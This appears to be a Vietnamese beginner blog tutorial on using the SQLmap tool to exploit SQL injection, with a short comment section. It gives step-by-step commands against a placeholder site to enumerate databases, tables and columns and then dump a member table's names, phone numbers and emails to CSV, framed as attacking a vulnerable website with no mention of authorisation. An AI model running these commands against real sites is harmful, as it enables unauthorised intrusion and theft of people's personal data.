Hướng dẫn sử dụng SQLmap cơ bản cho newbie

1

Trong bài viết này mình sẽ hướng dẫn sử dụng SQLmap để khai thác lỗi SQL Injection một cách hiệu quả.

Hướng dẫn sử dụng SQLmap này được thực hiện trên Kali Linux, các bạn khác dùng windows cũng có thể tải về để sử dụng tuy nhiên tốc độ trên Windows rất chậm so với Linux.

Bắt đầu nhé 😀

Ví dụ, mục tiêu của chúng ta là đường link : http://xxxx.com/product.php?id=1

Bước 1 : Khởi động SQLmap

Để bắt đầu với bài viết hướng dẫn sử dụng SQLmap thì bạn cần khởi động nó lên, Để khởi động SQLmap thì bạn gõ lệnh :

sqlmap

Để xem các tham số mà SQLmap hỗ trợ thì bạn thêm –help vào sau lệnh gọi như sau :

sqlmap --help

Để liệt kê danh sách database ( cơ sở dữ liệu) của website lỗi ta dùng lệnh

#sqlmap -u http://www.xxxx.com/cart.php?id=1 --dbs

Giải thích  :

-u : đường dẫn url
–dbs : Liệt kê databases ( Viết tắt của databases)

Sau khi chạy xong, nó sẽ liệt kê ra các database, giả sử bạn liệt kê được 1 database có tên là “ps_english” . Bây giờ bạn chạy tiếp lệnh :

#sqlmap -u http://www.xxxx.com/cart.php?id=1 -D ps_english --tables

Giải thích :

-D : chọn database để thao tác
–tables : Liệt kê các tables có trong database được chọn.

Sau khi liệt kê xong, bạn sẽ thấy các tables có trong DB đó, ví dụ bạn liệt kê được tables có tên member” . Bạn chạy tiếp lệnh:

#sqlmap -u http://www.xxxx.com/cart.php?id=1 -D ps_english -T member --columns

Giải thích :

-T : DBMS Chọn table để thao tác
–columns : Liệt kê columns có trong table được chọn.

Trong bài viết hướng dẫn sử dụng sqlmap này thì mình sẽ hướng dẫn luôn các bạn cách dump dữ liệu đã lấy được ra mặc định thành file CSV để tiên sử dụng sau này, Không giống các bài hướng dẫn sử dụng sqlmap trên mạng chỉ hướng dẫn sử dụng sqlmap để khai thác tên Database.

Sau khi chạy xong thì bạn sẽ có danh sách các columns của table đó, việc bây giờ chỉ là dump dữ liệu ra. Giả sử mình liệt kê ra có 3 cột là name, phone, email  giờ mình muốn lấy ra thì chỉ cần gõ :

sqlmap -u http://www.xxxx.com/cart.php?id=1 -D ps_english -T member -C name,phone,email --dump

File dữ liệu ngay lập tức sẽ được xuất ra dưới dạng CSV , SQLmap sau khi chạy xong sẽ in ra màn hình đường link tới file CSV này.

Chúc bạn thành công.

Đọc thêm :

1 Comment
  1. […] Post via anonymousvn […]

Leave A Reply

Your email address will not be published.